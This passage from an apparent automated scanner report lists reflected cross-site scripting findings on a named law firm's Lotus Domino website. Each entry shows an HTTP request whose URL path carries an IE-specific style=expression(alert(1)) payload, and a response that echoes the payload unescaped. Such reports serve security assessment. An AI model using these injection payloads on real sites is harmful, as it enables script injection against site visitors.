This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf26672"style%3d"x%3aexpression(alert(1))"fe0666a8b66/home_btn_01ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf26672"style="x:expression(alert(1))"fe0666a8b66/home_btn_01ov.jpg">
...[SNIP]...

4.131. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_01ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_01ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 was submitted in the REST URL parameter 5. This input was echoed as 4f2da"style="x:expression(alert(1))"0fe406f8278 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_01ov.jpg4f2da"style%3d"x%3aexpression(alert(1))"0fe406f8278 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_01ov.jpg4f2da"style="x:expression(alert(1))"0fe406f8278">
...[SNIP]...

4.132. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acc8e"style%3d"x%3aexpression(alert(1))"ace1f519915 was submitted in the REST URL parameter 3. This input was echoed as acc8e"style="x:expression(alert(1))"ace1f519915 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webacc8e"style%3d"x%3aexpression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webacc8e"style="x:expression(alert(1))"ace1f519915/br.nsf/home_btn_02ov.jpg">
...[SNIP]...

4.133. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 66197"style%3d"x%3aexpression(alert(1))"8bf47abd841 was submitted in the REST URL parameter 4. This input was echoed as 66197"style="x:expression(alert(1))"8bf47abd841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf66197"style%3d"x%3aexpression(alert(1))"8bf47abd841/home_btn_02ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf66197"style="x:expression(alert(1))"8bf47abd841/home_btn_02ov.jpg">
...[SNIP]...

4.134. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_02ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_02ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7644"style%3d"x%3aexpression(alert(1))"ce851a25267 was submitted in the REST URL parameter 5. This input was echoed as f7644"style="x:expression(alert(1))"ce851a25267 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_02ov.jpgf7644"style%3d"x%3aexpression(alert(1))"ce851a25267 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_02ov.jpgf7644"style="x:expression(alert(1))"ce851a25267">
...[SNIP]...

4.135. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1716"style%3d"x%3aexpression(alert(1))"4084a5490db was submitted in the REST URL parameter 3. This input was echoed as e1716"style="x:expression(alert(1))"4084a5490db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webe1716"style%3d"x%3aexpression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webe1716"style="x:expression(alert(1))"4084a5490db/br.nsf/home_btn_03ov.jpg">
...[SNIP]...

4.136. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a was submitted in the REST URL parameter 4. This input was echoed as ba47c"style="x:expression(alert(1))"c28d4b74f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfba47c"style%3d"x%3aexpression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfba47c"style="x:expression(alert(1))"c28d4b74f4a/home_btn_03ov.jpg">
...[SNIP]...

4.137. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_03ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_03ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 was submitted in the REST URL parameter 5. This input was echoed as 3a767"style="x:expression(alert(1))"548deb48dd4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_03ov.jpg3a767"style%3d"x%3aexpression(alert(1))"548deb48dd4 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_03ov.jpg3a767"style="x:expression(alert(1))"548deb48dd4">
...[SNIP]...

4.138. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4 was submitted in the REST URL parameter 3. This input was echoed as 52af3"style="x:expression(alert(1))"cdf88022cf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web52af3"style%3d"x%3aexpression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web52af3"style="x:expression(alert(1))"cdf88022cf4/br.nsf/home_btn_04ov.jpg">
...[SNIP]...

4.139. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de641"style%3d"x%3aexpression(alert(1))"3bc42b14411 was submitted in the REST URL parameter 4. This input was echoed as de641"style="x:expression(alert(1))"3bc42b14411 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsfde641"style%3d"x%3aexpression(alert(1))"3bc42b14411/home_btn_04ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsfde641"style="x:expression(alert(1))"3bc42b14411/home_btn_04ov.jpg">
...[SNIP]...

4.140. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_04ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_04ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ececd"style%3d"x%3aexpression(alert(1))"52b48d08320 was submitted in the REST URL parameter 5. This input was echoed as ececd"style="x:expression(alert(1))"52b48d08320 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf/home_btn_04ov.jpgececd"style%3d"x%3aexpression(alert(1))"52b48d08320 HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf/home_btn_04ov.jpgececd"style="x:expression(alert(1))"52b48d08320">
...[SNIP]...

4.141. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01 was submitted in the REST URL parameter 3. This input was echoed as ceaaf"style="x:expression(alert(1))"ff30546ad01 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/webceaaf"style%3d"x%3aexpression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:39 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - webceaaf"style="x:expression(alert(1))"ff30546ad01/br.nsf/home_btn_05ov.jpg">
...[SNIP]...

4.142. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0 was submitted in the REST URL parameter 4. This input was echoed as 8aca7"style="x:expression(alert(1))"f20c4010af0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /web/br.nsf/web/br.nsf8aca7"style%3d"x%3aexpression(alert(1))"f20c4010af0/home_btn_05ov.jpg HTTP/1.1
Host: www.butlerrubin.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.butlerrubin.com/web/br.nsf/index?openform
Cookie: __utma=131603356.1242486378.1305202765.1305202765.1305202765.1; __utmb=131603356; __utmc=131603356; __utmz=131603356.1305202765.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Thu, 12 May 2011 12:21:40 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 9324
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta name="description" content="Chicago-based Butler Rubin Saltarelli & Boyd LLP is a litigation boutique with a nationa
...[SNIP]...
<a href="mailto:jhurtado@butlerrubin.com?subject=Error on ButlerRubin.com - HTTP Web Server: Couldn't find design note - web/br.nsf8aca7"style="x:expression(alert(1))"f20c4010af0/home_btn_05ov.jpg">
...[SNIP]...

4.143. http://www.butlerrubin.com/web/br.nsf/web/br.nsf/home_btn_05ov.jpg [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butlerrubin.com
Path:   /web/br.nsf/web/br.nsf/home_btn_05ov.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d22b2"style%3d"x%3aexpression(alert(1))"06ea3ed31de was submitted in the REST URL parameter 5. This input was echoed as d22b2"style="x:expression(alert(1))"06ea3ed31de in the application's response.

